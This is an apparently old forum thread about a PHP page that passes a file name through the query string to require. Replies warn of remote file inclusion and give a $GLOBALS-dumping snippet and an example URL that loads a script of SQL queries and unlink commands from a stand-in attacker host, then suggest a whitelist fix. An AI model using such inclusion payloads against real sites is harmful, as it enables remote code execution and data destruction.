HACK with REQUIRE

Anon

can anybody hack me ?
on my page I use something like this [a href=index.php3?page_to_require_=page.php3] CLICK HERE [/a]
is that dangerous ? tx

[deleted]

"is that dangerous"

very, extremely dangerous.

just create a script like this
<?
print_r($GLOBALS);
?>

and put in the 'page_to_require' field.

Anon

Since it's sometimes possible to include remote files, that becomes very insecure. I could write a text file with some sql queries, unlink commands etc., then call your script like:

index.php3?page_to_require_=http://myhacksite.com/real_bad_script.txt

Not sure if I'd need a .php extension, but if I did, it's simply make the php script output php, or stop php from being parsed in that file.

You could try setting up an array of all files you'll want to include, then just pass the id over in the querystring, and have it include the array and look up which file it wants. This way, the requires are limited to the files you've put in the array.

[deleted]

It does not require the .php extention.
require and include work fir remote files the same way they work with local files. Whatever they receive from the remote host is parsed asif it is a normal PHP file. Code is executed, text is printed.

This is a very very very bad idea.